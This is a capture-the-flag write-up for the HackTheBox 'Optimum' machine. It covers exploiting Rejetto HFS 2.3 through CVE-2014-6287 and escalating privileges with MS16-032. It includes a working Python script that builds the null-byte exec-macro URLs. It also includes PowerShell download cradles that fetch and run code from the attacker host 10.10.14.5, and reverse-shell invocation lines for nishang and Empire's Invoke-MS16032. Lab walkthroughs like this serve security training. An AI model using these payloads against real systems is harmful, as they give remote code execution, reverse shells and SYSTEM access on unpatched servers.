# HackTheBox - Optimum

![](/files/-MYEz0XG-1ic3xVGYWGa)

### Nmap scan (basic and all ports)

![](/files/-MYEzMunNNe7tjR8v0so)

The full-port scan returned the same results as the default scan, so our attention goes to port 80 (HTTP server).

### Website Surface Testing

![](/files/-MYEziLI_dDgiobZBXLv)

The website is running Rejetto HTTP File Server (HFS). Version running: `HttpFileServer 2.3`. There is a well-known remote code execution flaw in this version line (CVE-2014-6287 affects 2.3x before 2.3c).

searchsploit or a quick web search will turn up the vulnerability and public exploits.

### CVE-2014-6287 (Exploit)

![](/files/-MYF-Dtzq3FtJBN5CFMt)

![](/files/-MYF-4IcDs0b4GealYFd)

{% hint style="info" %}
From the rejetto wiki: also known as template macros, these are commands with some useful effects that users can input in **HFS** to improve a template or to create functionality not otherwise available.
{% endhint %}

```
References: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
https://www.exploit-db.com/exploits/39161
```

### Manual Exploitation

The `search` parameter is vulnerable: a leading null byte (`%00`) stops HFS from neutralising template macros in the query string, so an `{.exec|...}` macro placed after it is evaluated on the server. That gives us Remote Code Execution.

![](/files/-MYFPFn41C-XdypvEliP)

![](/files/-MYFPL0fi_DUTPeo260h)

We get a ping request back on our side, which confirms command execution. Let's turn that into a reverse shell with PowerShell, using nishang's `Invoke-PowerShellTcp.ps1`: host the script on a web server, append the line that actually calls the function (the file itself only defines it), and have the target fetch and run it with a download cradle.

Github link: <https://github.com/samratashok/nishang/tree/master/Shells>

{% hint style="info" %}
Note: URL-encode the command before sending it (spaces, quotes and parentheses in the PowerShell cradle otherwise break the request), and keep the leading `%00` exactly as-is.
{% endhint %}
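The request construction described in the manual exploitation steps above, as an added example (this is not code from the original write-up, from Rejetto or from nishang). It builds the `?search=%00{.exec|...}` URL, percent-encodes the command, and appends the invocation line to the nishang script. The attacker IP and web-server port are the ones the page uses later (`10.10.14.5:8000`); the listener port, target URL and the `SysNative` PowerShell path are assumptions, and nothing is sent unless `send()` is called.

```python
"""
Added example (not code from the original write-up, Rejetto, or nishang).
Builds the CVE-2014-6287 request for HFS 2.3 and stages the nishang shell.
Assumed values: listener port and target URL are NOT given on the page and
are placeholders. Nothing is sent unless send() is called explicitly.
"""
import urllib.parse
import urllib.request

ATTACKER_IP = "10.10.14.5"     # from the page's Invoke-MS16032 line
HTTP_PORT = 8000               # also from that line (http://10.10.14.5:8000/)
SHELL_PORT = 443               # assumed: netcat listener port
TARGET = "http://10.10.10.8/"  # assumed: HFS base URL of the box

# Assumed path: 64-bit PowerShell reached through the WOW64 redirect, since
# HFS is a 32-bit process and plain System32 would give it the 32-bit one.
POWERSHELL = r"C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe"


def hfs_exec_macro(command: str) -> str:
    """HFS template macro that runs a program. On 2.3x before 2.3c a %00 in
    front of it stops the search handler from neutralising the macro."""
    return "{.exec|" + command + ".}"


def build_url(base: str, command: str) -> str:
    """Full exploit URL. The null byte stays as the literal %00; the command
    is percent-encoded so spaces, quotes and parentheses survive the query
    string. Braces and the pipe are left readable (HFS decodes either form)."""
    encoded = urllib.parse.quote(hfs_exec_macro(command), safe="{}|")
    return base.rstrip("/") + "/?search=%00" + encoded


def ping_probe(attacker_ip: str) -> str:
    """First test: a single ICMP echo back to us (watch the VPN interface)."""
    return f"ping -n 1 {attacker_ip}"


def download_cradle(attacker_ip: str, http_port: int, script: str) -> str:
    """Fetch a hosted .ps1 and run it in memory; same shape as the cradle the
    page later passes to Invoke-MS16032 -Command."""
    url = f"http://{attacker_ip}:{http_port}/{script}"
    return f"{POWERSHELL} IEX(New-Object Net.WebClient).DownloadString('{url}')"


def stage_reverse_shell(script_text: str, attacker_ip: str, port: int) -> str:
    """nishang's Invoke-PowerShellTcp.ps1 only defines the function. Append the
    call so the shell connects back as soon as IEX finishes loading the file
    (the same edit the page makes to the Empire MS16-032 script)."""
    call = f"Invoke-PowerShellTcp -Reverse -IPAddress {attacker_ip} -Port {port}"
    return script_text.rstrip("\r\n") + "\r\n" + call + "\r\n"


def send(url: str, timeout: float = 5.0) -> int:
    """Fire the request. HFS answers with an ordinary search page whatever
    happens, so the HTTP status says little: the ping or the callback on the
    listener is the real signal."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    print(build_url(TARGET, ping_probe(ATTACKER_IP)))
    print(build_url(TARGET, download_cradle(ATTACKER_IP, HTTP_PORT, "shell.ps1")))
    # Constructed stand-in for the real nishang file, so this runs offline.
    stub = "function Invoke-PowerShellTcp { param($IPAddress, $Port, [switch]$Reverse) }\n"
    print(stage_reverse_shell(stub, ATTACKER_IP, SHELL_PORT))
```

Run the ping URL first with a packet capture on the VPN interface; only after the echo arrives write the staged script to `shell.ps1`, serve it from the directory the cradle points at, start the listener on `SHELL_PORT`, and send the cradle URL.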

![](/files/-MYFQJEpz_CVHwrDmJuL)

![](/files/-MYFQSZSoRd7y7-jn_TZ)

### Running Sherlock.ps1 (By Rastamouse)

![](/files/-MYFRXSeqkLzwjYpb_jq)

![](/files/-MYFRw8Xg5c8IsmAbYtg)

Sherlock: <https://github.com/rasta-mouse/Sherlock>

So the system looks vulnerable to MS16-032 (Secondary Logon Handle Privilege Escalation). The original script is on Exploit-DB, but Empire ships a modified version that takes a `-Command` parameter, which is the one used here.

Github link: <https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1>

### MS16-032 Exploitation (Secondary Logon Handle Privilege Escalation)

Like the nishang shell, the Empire script only defines `Invoke-MS16032`; add the following line at the end so the exploit fires as soon as the script is loaded, and change the IP, port and script name to match your setup. `shell2.ps1` is a second reverse-shell script run by the elevated process; it needs its own listener on a different port, since the first listener is occupied by the shell you launch this from.

```
Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell2.ps1')" 
```

![](/files/-MYFSssgFqFXaa4leAyF)

![](/files/-MYFTMU-Rv9B9Fv5BVpo)

![](/files/-MYFTPqw1JIXwpxyh8Su)

